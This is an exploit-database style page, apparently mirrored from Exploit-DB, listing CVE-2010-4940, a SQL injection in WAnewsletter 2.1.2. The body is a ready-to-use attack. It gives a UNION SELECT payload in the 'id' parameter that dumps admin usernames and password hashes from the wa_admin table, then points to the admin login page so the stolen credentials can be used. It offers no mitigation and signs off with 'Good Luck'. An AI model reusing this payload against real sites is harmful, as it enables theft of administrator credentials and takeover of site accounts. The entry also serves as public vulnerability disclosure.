[] NeoSense
E X P L O I T S
title author type platform port cve id

WAnewsletter 2.1.2 - SQL Injection

Author: BrOx-Dz
type: webapps
platform: php
port: 
date_added: 2010-09-23 
date_updated: 2010-09-23 
verified: 1 
codes: CVE-2010-4940;OSVDB-76230 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwanewsletter-2.1.2.zip
================================================
WAnewsletter v 2.1.2 SQL Injection Vulnerability
================================================

################################################################################################
# Exploit Title: WAnewsletter v 2.1.2 SQL Injection Vulnerabilitie
# Date: 23/09/2010
# Author: BrOx-Dz
# Author: E.dz@hotmail.fr
# Software Link:http://phpcodeur.net/wascripts/wanewsletter/releases/2.1.2/wanewsletter-2.1.2.zip
# Dork  : no Kids
# Version: 2.1.2
# Tested on: windows xp pack 3
################################################################################################


--[ Exploitable ]--

http://site/index.php?service=5&id=[SQL Injection]



http://site/index.php?service=5&id=4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--


and go

http://site/admin/login.php


--[ Demo ]--


http://site/index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--




Good Luck
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.